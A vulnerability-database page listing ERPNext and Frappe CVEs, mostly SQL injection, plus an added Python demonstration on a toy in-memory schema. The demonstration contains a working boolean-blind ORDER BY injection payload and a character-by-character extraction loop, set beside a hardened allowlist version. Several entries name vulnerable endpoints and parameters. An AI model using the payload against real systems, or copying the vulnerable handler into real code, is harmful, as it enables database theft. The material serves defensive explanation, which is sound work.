
Frappe Erpnext vulnerabilities

61 known vulnerabilities affecting frappe/erpnext.

Total CVEs
61
CISA KEV
0
Public exploits
3
Exploited in wild
0
Severity breakdown
CRITICAL 7, HIGH 21, MEDIUM 31, LOW 2

Vulnerabilities

Page 2 of 4
CVE-2026-32954 | P3 | HIGH | CVSS 7.5 | fixed in 15.100.0; ≥ 16.0.0, < 16.8.0; +1 more | 2026-03-20
[HIGH] CWE-89: ERP is a free and open source Enterprise Resource Planning tool. In versions prior to 16.8.0 and 15.100.0, certain endpoints were vulnerable to time-based and boolean-based blind SQL injection due to insufficient parameter validation, allowing attackers to infer database information. This issue has been fixed in versions 15.100.0 and 16.8.0.
nvd
CVE-2018-3884 | P3 | HIGH | CVSS 8.8 | v10.1.6 | 2018-09-12
[HIGH] CWE-89: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The sort_by and start parameters can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
nvd
CVE-2018-3883 | P3 | HIGH | CVSS 8.8 | v10.1.6 | 2018-09-12
[HIGH] CWE-89: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The employee and sort_order parameters can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
nvd
CVE-2018-3885 | P3 | HIGH | CVSS 8.8 | v10.1.6 | 2018-09-12
[HIGH] CWE-89: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The order_by parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
nvd
CVE-2018-3882 | P3 | HIGH | CVSS 8.8 | v10.1.6 | 2018-09-12
[HIGH] CWE-89: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The searchfield parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
nvd
CVE-2025-52044 | P3 | HIGH | CVSS 7.5 | v15.57.5 | 2025-09-16
[HIGH] CWE-89: In Frappe ERPNext v15.57.5, the function get_stock_balance() at erpnext/stock/utils.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting SQL query into inventory_dimensions_dict parameter.
nvd
CVE-2026-44447 | P3 | HIGH | CVSS 7.5 | fixed in 16.9.0 | 2026-05-13
[HIGH] CWE-89: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 16.9.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 16.9.0.
nvd
CVE-2026-44446 | P3 | HIGH | CVSS 7.5 | fixed in 15.104.3; ≥ 16.0.0, < 16.14.0; +1 more | 2026-05-13
[HIGH] CWE-89: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.14.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 15.104.3 and 16.14.0.
nvd
CVE-2025-65267 | P3 | CRITICAL | CVSS 9.0 | v15.83.2 | 2025-12-03
[CRITICAL] CWE-79: In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege esca
nvd
CVE-2018-20061 | P3 | HIGH | CVSS 7.5 | ≥ 10.0.0, ≤ 10.1.76; ≥ 11.0.0, < 11.0.3; +1 more | 2018-12-11
[HIGH] CWE-89: A SQL injection issue was discovered in ERPNext 10.x and 11.x through 11.0.3-beta.29. This attack is only available to a logged-in user; however, many ERPNext sites allow account creation via the web. No special privileges are needed to conduct the attack. By calling a JavaScript function that calls a server-side Python function with carefully chosen a
nvd
CVE-2025-56380 | P3 | MEDIUM | CVSS 6.5 | v15.67.0 | 2025-10-02
[MEDIUM] CWE-89: Frappe Framework v15.72.4 was discovered to contain a SQL injection vulnerability via the fieldname parameter in the frappe.client.get_value API endpoint and a crafted script to the fieldname parameter
nvd
CVE-2025-56381 | P3 | MEDIUM | CVSS 6.5 | v15.67.0 | 2025-10-02
[MEDIUM] CWE-89: ERPNEXT v15.67.0 was discovered to contain multiple SQL injection vulnerabilities in the /api/method/frappe.desk.reportview.get endpoint via the order_by and group_by parameters.
nvd
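Most CWE-89 entries on this page share one shape: a sort or grouping parameter (sort_by, sort_order, order_by, group_by) reaches the query as SQL text rather than as a bound value, and CVE-2026-32954 names the consequence, boolean-based blind inference. The block below is an added illustration of that class on a constructed toy schema; it is not ERPNext or Frappe code and does not reproduce any of the listed endpoints. The table and column names, the hypothetical handler functions, and the secret value are all assumptions made for the example, and SQLite is used only so it runs self-contained.

```python
import re
import sqlite3
import string

# Allowlist of columns a client may sort by (constructed for this toy schema).
ALLOWED_SORT_COLUMNS = frozenset({"name", "salary"})
_DIRECTION = re.compile(r"^(asc|desc)$", re.IGNORECASE)


def make_db():
    """In-memory toy database; schema, rows and the secret are constructed for this example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE employee (name TEXT, department TEXT, salary INTEGER)")
    con.executemany(
        "INSERT INTO employee VALUES (?, ?, ?)",
        [("EMP-0001", "Sales", 50000), ("EMP-0002", "Sales", 70000), ("EMP-0003", "Sales", 55000)],
    )
    con.execute("CREATE TABLE secret (token TEXT)")
    con.execute("INSERT INTO secret VALUES ('k7')")
    return con


def list_employees_vulnerable(con, department, order_by):
    """Hypothetical vulnerable handler: the filter value is bound, but the sort
    expression is spliced into the query text and so becomes part of the SQL grammar."""
    sql = f"SELECT name FROM employee WHERE department = ? ORDER BY {order_by}"
    return [row[0] for row in con.execute(sql, (department,))]


def boolean_blind_probe(con, position, alphabet=string.ascii_lowercase + string.digits):
    """Recover one character of secret.token using only the order of the returned rows.
    The CASE key equals `name` when the guess is right (rows come back ascending) and is
    NULL for every row when it is wrong, so the tie-break `name DESC` decides the order."""
    for guess in alphabet:
        payload = (
            f"CASE WHEN (SELECT substr(token, {position}, 1) FROM secret) = '{guess}' "
            f"THEN name END ASC, name DESC"
        )
        rows = list_employees_vulnerable(con, "Sales", payload)
        if rows == sorted(rows):
            return guess
    return None


def recover_token(con, length):
    """Chain the oracle over each position; '?' marks a character outside the alphabet."""
    return "".join(boolean_blind_probe(con, i) or "?" for i in range(1, length + 1))


def validate_sort(sort_by, direction):
    """True only for an allowlisted column and a literal ASC/DESC direction."""
    return sort_by in ALLOWED_SORT_COLUMNS and _DIRECTION.match(direction) is not None


def list_employees_hardened(con, department, sort_by="name", direction="asc"):
    """Hardened form: column and direction are checked against fixed sets before being
    placed in the statement as a quoted identifier and a keyword; only the filter value
    is client data, and it stays a bound parameter."""
    if not validate_sort(sort_by, direction):
        raise ValueError(f"unsupported sort: {sort_by!r} {direction!r}")
    sql = (
        'SELECT name FROM employee WHERE department = ? '
        f'ORDER BY "{sort_by}" {direction.upper()}'
    )
    return [row[0] for row in con.execute(sql, (department,))]


if __name__ == "__main__":
    db = make_db()
    print("blind probe recovered:", recover_token(db, 2))
    print("hardened, salary desc:", list_employees_hardened(db, "Sales", "salary", "desc"))
```

The probe never sees an error or the secret itself; it reads one bit per request from whether the rows came back ascending or descending, which is why these issues are rated as information disclosure even when the endpoint only returns a list. The fix is not escaping: a sort column is an identifier, not a value, so it cannot be parameterised and must be matched against a fixed set of permitted names.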
CVE-2025-52050 | P3 | MEDIUM | CVSS 6.5 | v15.57.5 | 2025-09-30
[MEDIUM] CWE-89: In Frappe ERPNext 15.57.5, the function get_loyalty_program_details_with_points() at erpnext/accounts/doctype/loyalty_program/loyalty_program.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting a SQL query into the expiry_date parameter.
nvd
CVE-2026-44445 | P3 | MEDIUM | CVSS 6.5 | fixed in 15.104.3; ≥ 16.0.0, < 16.12.0; +1 more | 2026-05-13
[MEDIUM] CWE-611: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.12.0, an improper restriction of XML external entity (XXE) reference vulnerability in the EDI Module enables an authenticated attacker to read files from the local file system, including sensitive configuration files. This vulnerability is fixed in 15.104.3
nvd
CVE-2025-52049 | P3 | MEDIUM | CVSS 6.5 | v15.57.5 | 2025-09-30
[MEDIUM] CWE-89: In Frappe ErpNext v15.57.5, the function get_timesheet_detail_rate() at erpnext/projects/doctype/timesheet/timesheet.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting SQL query into the timelog parameter.
nvd
CVE-2025-52043 | P3 | MEDIUM | CVSS 6.5 | v15.57.5 | 2025-09-30
[MEDIUM] CWE-89: In Frappe ERPNext v15.57.5, the function import_coa() at erpnext/accounts/doctype/chart_of_accounts_importer/chart_of_accounts_importer.py is vulnerable to SQL injection, which allows an attacker to extract all information from databases by injecting a SQL query into the company parameter.
nvd
CVE-2025-52047 | P3 | MEDIUM | CVSS 6.5 | v15.57.5 | 2025-09-30
[MEDIUM] CWE-89: In Frappe ErpNext v15.57.5, the function get_income_account() at erpnext/controllers/queries.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting a SQL query into the filters.disabled parameter.
nvd
CVE-2026-44448 | P3 | MEDIUM | CVSS 6.5 | fixed in 15.102.0; ≥ 16.0.0, < 16.11.0; +1 more | 2026-05-13
[MEDIUM] CWE-862: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, certain endpoints failed to enforce proper authorization checks, allowing users to modify data beyond their permitted role. This vulnerability is fixed in 15.102.0 and 16.11.0.
nvd
CVE-2026-44440 | P4 | MEDIUM | CVSS 5.7 | fixed in 15.101.1; ≥ 16.0.0, < 16.10.0; +1 more | 2026-05-13
[MEDIUM] CWE-22: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability on an endpoint allows an authenticated adjacent attacker to read arbitrary files. This vulnerability is fixed in 15.101.1 and 16.10.0.
nvd
CVE-2026-42840 | P4 | MEDIUM | CVSS 5.1 | v16.16.0 | 2026-06-03
[MEDIUM] CWE-79: An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a Customer record and trigger unescaped rendering in the Point of Sale (POS) interface for every operator who selects that customer. This issue affects ERPNext: 16.16.0.
nvd